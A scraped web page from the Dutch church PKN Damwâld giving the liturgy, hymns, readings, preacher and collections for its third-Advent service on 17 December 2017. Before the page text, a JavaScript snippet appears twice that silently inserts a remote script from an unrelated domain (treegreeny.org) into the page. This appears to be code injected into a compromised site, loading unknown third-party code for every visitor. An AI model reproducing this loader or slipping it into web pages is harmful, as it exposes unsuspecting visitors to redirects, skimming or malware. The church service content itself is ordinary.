;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 17 december 2017 9:30 uur - PKN Damwâld
zondag 17 december 2017
09:30 uur
KingKids-kerstproject

Kerkdienst zondag 17 december 2017 9:30 uur

Thema: Derde Advent

Informatie

Voorganger:Ds. J. Bakker, Feanwâlden
Organist:Nienke van der Heide-Visser
Thema:Derde Advent
Mededeling:KingKids-kerstproject
Liturgie
Lied voor de dienst Gezang 127: 1, 2 en 3
welkom en mededelingen
We zingen: Psalm 85
Stil gebed, Votum en Groet
de derde adventskaars wordt aangestoken
en er wordt een gedicht uitgesproken
We zingen: Gezang 118
Gebed van de zondag
adventsproject King Kids
de leiding van de kindernevendienst vertelt
een bijbelverhaal n.a.v. Jona 3: “Gehoorzamen aan Gods liefde”
We zingen: Projectlied
We lezen: Jesaja 35
We zingen: Psalm 146: 1, 3 en 5
We lezen: Mattheüs 11, 2-15
We zingen: Gezang 66: 1, 3 en 6
Preek .
We zingen: Gezang 125: 1, 3 en 5
gebeden, stil gebed en Onze Vader
Collecte
We zingen: Gezang 124
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: PDC De Herberg

Het Pastoraal Diaconaal Centrum De Herberg wil als verlengstuk van de plaatselijke kerkelijke gemeente een tijdelijk huis en geestelijke begeleiding bieden aan individuele gemeenteleden die, om wat voor reden ook, even afstand willen nemen van hun woon/werksituatie en zich willen bezinnen op levensvragen. Daarbij kunnen psycho-sociale problemen een rol spelen.
De stichting tracht haar doel te bereiken door het bieden van: een Christelijke leefgemeenschap; individuele geestelijke begeleiding door professionele begeleiders; een beperkt dagprogramma, rust en ruimte; advies met betrekking tot nazorg en informatie en advies aan de plaatselijk gemeente.

Tweede collecte: Kerk
Uitganscollecte: Kerk